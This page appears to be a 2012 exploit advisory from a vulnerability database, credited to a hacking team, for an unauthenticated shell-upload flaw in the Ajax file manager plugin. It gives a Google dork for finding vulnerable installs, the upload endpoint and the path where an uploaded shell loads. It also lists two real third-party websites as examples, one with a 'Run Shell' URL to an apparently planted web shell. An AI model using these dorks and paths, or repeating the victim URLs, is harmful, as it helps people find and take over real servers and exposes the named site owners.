Ajax Data Uploader Shell Upload

2012.07.14
Credit: Mr.XpR
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

################################################################## 0101010101----010101010101010 01 01------0101 0101 01 01------0101 0101 01 01------0101 0101 01 01------0101 0101 01 01------0101 0101 01 01------0101 0101 01 01------0101010101 01 01------0101 010 01 01------0101 010 01 01------0101 010 01 01------0101 010 01 01------0101 010 0101010101----0101 010 ################################################################## [+] Exploit Title : Ajax Data Uploader (RfU) [+] Google Dork : inurl:plugins/ajaxfilemanager/inc/data.php [+] Autor : Mr.XpR [+] Version : All Version [+] Contact : No0PM@yahoo.com [+] Researcher Team : IRaNHaCK Security Team [+] Bug Level : RFU (High) [+] Test : 7 , Linux Back Track ################################################################## [+]Exploit [-] http://Site.CoM/admin/editor/plugins/ajaxfilemanager/inc/data.php [+]Load Shell [-] http://Site.CoM/admin/editor/plugins/ajaxfilemanager/inc/Shell.PHP [+]Example : [-] http://faq.alder-schwe.de/admin/editor/plugins/ajaxfilemanager/inc/data.php [-] http://www.sichtpunkt-hamburg.de/phpmyfaq/admin/editor/plugins/ajaxfilemanager/inc/data.php [-] More In Google ... Run Shell : http://faq.alder-schwe.de/admin/editor/plugins/ajaxfilemanager/inc/xpr.php Persian Gulf For Ever - Tnx To all Persian Hackerz Bax: Siamak Black - UnknowN - Farbod ezrael - Hellboy - Samim.s - Sianor - IRH - IRBH - IRIST - All IRanian Hackers


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top